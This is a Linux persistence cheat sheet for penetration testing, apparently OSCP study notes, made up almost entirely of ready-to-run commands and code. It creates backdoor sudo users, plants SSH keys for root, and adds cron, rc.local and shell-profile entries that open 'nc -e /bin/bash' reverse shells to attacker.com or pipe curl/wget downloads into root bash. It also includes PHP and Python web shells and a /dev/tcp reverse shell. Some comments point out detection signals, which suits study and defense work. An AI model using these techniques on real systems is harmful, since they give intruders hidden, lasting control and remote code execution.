Persistence
This document outlines basic methods to maintain access to Linux systems during penetration testing engagements, focusing on techniques covered in the OSCP curriculum.
Table of Contents
User Account Manipulation
Creating New Users
# Add new user with root privileges
# useradd -m creates the home directory and -s sets the login shell. Each
# command in this group leaves a trace in /etc/passwd, /etc/shadow and
# /etc/group (sudo / wheel membership), which is why those files and the
# membership of the admin groups are routine audit points.
useradd -m -s /bin/bash backdooruser
# Membership in the sudo group is what provides the "root privileges" above.
usermod -aG sudo backdooruser
# Interactive: prompts for the new account's password.
passwd backdooruser
# Add user to sudo group on Debian/Ubuntu systems
adduser backdooruser sudo
# Add user to wheel group on CentOS/RHEL systems
usermod -aG wheel backdooruser
Modifying Existing Users
# Change user shell
usermod -s /bin/bash user
# Add user to sudoers
usermod -aG sudo user
# Drop-in sudoers fragment granting the user full sudo rights. Unexpected
# files in /etc/sudoers.d are a standard audit item; `visudo -c` validates and
# lists every file sudo would read.
echo "user ALL=(ALL:ALL) ALL" >> /etc/sudoers.d/user
# Modify user password
# chpasswd reads user:password pairs from stdin, so the new password is part
# of the command line and ends up in shell history when run interactively.
echo 'user:password' | chpasswd
passwd user
SSH Backdoors
Authorized Keys
# Add SSH key to authorized_keys
mkdir -p /home/user/.ssh
# The key is appended, so existing keys stay valid; the file is where to look
# for unexpected entries during review (for every account, root included).
echo "ssh-rsa AAAAB3NzaC1yc2EA..." >> /home/user/.ssh/authorized_keys
# With StrictModes (sshd's default) keys are ignored when the directory or file
# is writable by others, hence 700 / 600 and the ownership fix below.
chmod 700 /home/user/.ssh
chmod 600 /home/user/.ssh/authorized_keys
chown -R user:user /home/user/.ssh
# Add SSH key to root user
# Whether a root key is usable at all additionally depends on sshd's
# PermitRootLogin setting.
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EA..." >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
SSH Configuration Changes
# Add secondary port for SSH
# sshd listens on every Port directive present, and once any Port line exists
# the default of 22 is no longer implied, so 22 is re-added explicitly next to
# 2222. Extra Port lines appended at the end of sshd_config stand out in a
# config review; `sshd -T` prints the effective configuration.
echo "Port 22" >> /etc/ssh/sshd_config
echo "Port 2222" >> /etc/ssh/sshd_config
systemctl restart sshd
Cron Jobs
Persistent Cron Jobs
# System-wide cron job
# /etc/crontab and /etc/cron.d entries carry a user field ("root") that a
# per-user crontab does not; all three entries here run every minute.
# nc -e attaches /bin/bash to the outbound connection and is not available in
# every netcat build. A cron-spawned process opening an outbound connection
# on a fixed schedule is a strong detection signal.
echo "* * * * * root nc -e /bin/bash attacker.com 4444" >> /etc/crontab
# User cron job
# crontab -l dumps the current user's crontab; appending one line and piping
# the result back into `crontab -` replaces it without losing existing entries
# (stderr of the listing is discarded so a missing crontab prints no error).
(crontab -l 2>/dev/null; echo "* * * * * nc -e /bin/bash attacker.com 4444") | crontab -
# Add to cron.d directory
echo "* * * * * root nc -e /bin/bash attacker.com 4444" > /etc/cron.d/system-update
Less Obvious Cron Jobs
# Using wget to fetch and execute a script
# The downloaded content is piped straight into bash, so whatever the remote
# host serves at that moment runs as root every 5 (respectively 10) minutes.
# The observable trace is scheduled outbound HTTP from the cron daemon.
echo "*/5 * * * * root wget -q -O- http://attacker.com/script.sh | bash" >> /etc/crontab
# Using curl to fetch and execute a script
echo "*/10 * * * * root curl -s http://attacker.com/script.sh | bash" >> /etc/crontab
Startup Scripts
RC Scripts
# Add to rc.local
# Note the single '>' on the first line: an existing /etc/rc.local is
# overwritten, not extended. systemd's rc.local compatibility only runs the
# file when it is executable, which is what the chmod +x that follows
# provides; a modified or newly executable /etc/rc.local is an easy
# integrity-check hit.
echo "#!/bin/bash" > /etc/rc.local
echo "nc -e /bin/bash attacker.com 4444 &" >> /etc/rc.local
echo "exit 0" >> /etc/rc.local
chmod +x /etc/rc.local
Bash Profile
# Add to .bashrc for user persistence
# Runs on every interactive shell of this user; nohup plus '&' keeps the
# connection alive after that shell exits.
echo "nohup nc -e /bin/bash attacker.com 4444 &" >> ~/.bashrc
# Add to global profile
# /etc/profile is read by the login shells of every user, so this fires on
# each login; shell startup files are a routine review target.
echo "nohup nc -e /bin/bash attacker.com 4444 &" >> /etc/profile
Web Shells
PHP Web Shell
// Simple PHP web shell (shell.php)
<?php
// NOTE(review): the comment line above sits outside the PHP tags, so the
// server emits it as literal text.
// Any request carrying a 'cmd' parameter (GET, POST or, depending on PHP's
// request_order, cookie) is handed unchanged to system(). Requests with a
// cmd= parameter to a .php file living among static assets are the
// detection signal.
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);   // runs as the web server user; output goes into the response
    echo "</pre>";
    die;            // stop here so nothing else is emitted
}
?>
# Deploy to common web directories
# The copy lands in a static-content directory (images/); a .php file among
# static assets is exactly what a file-integrity check on the web root should
# catch.
cp shell.php /var/www/html/images/logo.php
# Access via: http://target/images/logo.php?cmd=id
Simple Netcat Reverse Shell from Web
// Simple reverse shell in PHP
<?php
// /dev/tcp/host/port is a bash redirection feature rather than a real device,
// which is why bash is invoked explicitly. exec() runs it as the web server
// user; an outbound TCP connection originating from the web server process is
// the detection point.
exec("/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'");
?>
Python Web Shell
# Simple Python web shell (for CGI-enabled servers)
#!/usr/bin/python
# CGI handler: hands the 'cmd' form field to a shell and returns its output.
# The cgi module was deprecated in Python 3.11 and removed in 3.13, so this
# listing targets older interpreters.
import cgi
import subprocess
# Header plus the blank line that terminates the CGI headers.
print("Content-Type: text/html\n")
form = cgi.FieldStorage()
cmd = form.getvalue('cmd')
if cmd:
    # shell=True passes the field to the system shell unchanged; a non-zero
    # exit status raises CalledProcessError, which nothing here catches.
    output = subprocess.check_output(cmd, shell=True)
    print("<pre>")
    # NOTE(review): on Python 3 check_output returns bytes, so this prints the
    # bytes repr rather than the decoded text.
    print(output)
    print("</pre>")
else:
    print("<form method='POST'>")
    print("<input type='text' name='cmd'>")
    print("<input type='submit' value='Execute'>")
print("</form>")
Additional Resources